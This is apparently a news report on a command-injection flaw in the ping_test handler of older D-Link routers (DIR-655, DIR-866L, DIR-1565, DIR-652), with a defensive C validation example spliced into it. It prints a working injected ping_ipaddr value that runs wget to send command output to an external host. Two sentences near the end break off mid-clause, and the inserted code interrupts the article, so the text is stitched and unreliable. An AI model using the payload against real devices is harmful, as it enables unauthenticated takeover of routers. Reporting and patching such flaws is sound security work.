In D-Link routers
Interestingly, according to the firmware developers, the "ping_test" call should be executed only after authentication, but in reality it is called in every case, regardless of whether the user is logged in to the web interface. In particular, when the apply_sec.cgi script is accessed with the parameter "action=ping_test", the script redirects to the authentication page, but at the same time performs the action associated with ping_test. To execute code, another vulnerability in ping_test itself was used: it calls the ping utility without properly checking the correctness of the IP address submitted for the test. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
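The following is an added example, not code from the original article or from D-Link firmware. It shows, in C, the two checks the paragraph above describes as missing: authentication is verified before any action runs, and the address is strictly validated, with ping arguments built as an argv array so no shell parses the value. The names `dispatch`, `valid_ping_target` and the result codes are hypothetical.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

enum result { DENY_UNAUTH, REJECT_INPUT, RUN_PING, UNKNOWN_ACTION };

/* Accept only a literal dotted-quad IPv4 address. inet_pton() rejects
 * newlines, spaces, '$' and any other trailing data, so a value that
 * carried a URL-encoded "%0a" never passes once decoded. */
static int valid_ping_target(const char *s)
{
    struct in_addr a;
    return s != NULL && strlen(s) <= 15 && inet_pton(AF_INET, s, &a) == 1;
}

/* Hypothetical request dispatcher (assumption: the caller has already
 * URL-decoded the parameters). On RUN_PING, argv is filled for
 * execv()-style execution instead of system()/popen(). */
static enum result dispatch(int authenticated, const char *action,
                            const char *ping_ipaddr, const char *argv[5])
{
    if (!authenticated)              /* checked BEFORE any action runs */
        return DENY_UNAUTH;
    if (action == NULL || strcmp(action, "ping_test") != 0)
        return UNKNOWN_ACTION;
    if (!valid_ping_target(ping_ipaddr))
        return REJECT_INPUT;
    argv[0] = "ping"; argv[1] = "-c"; argv[2] = "1";
    argv[3] = ping_ipaddr; argv[4] = NULL;
    return RUN_PING;
}

int main(void)
{
    const char *argv[5];
    /* Constructed input: an address followed by a decoded newline. */
    const char *bad = "127.0.0.1\nwget";
    printf("unauthenticated=%d injected=%d valid=%d\n",
           dispatch(0, "ping_test", "127.0.0.1", argv),
           dispatch(1, "ping_test", bad, argv),
           dispatch(1, "ping_test", "127.0.0.1", argv));
    return 0;
}
```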
The presence of the vulnerability has been confirmed in the following models:
- DIR-655 with firmware 3.02b05 or older;
- DIR-866L with firmware 1.03b04 or older;
- DIR-1565 with firmware 1.01 or older;
- DIR-652 (no information is provided about the affected firmware versions)
The support period for these models has ended, so D-Link
It was later found that the vulnerability
Source: opennet.ru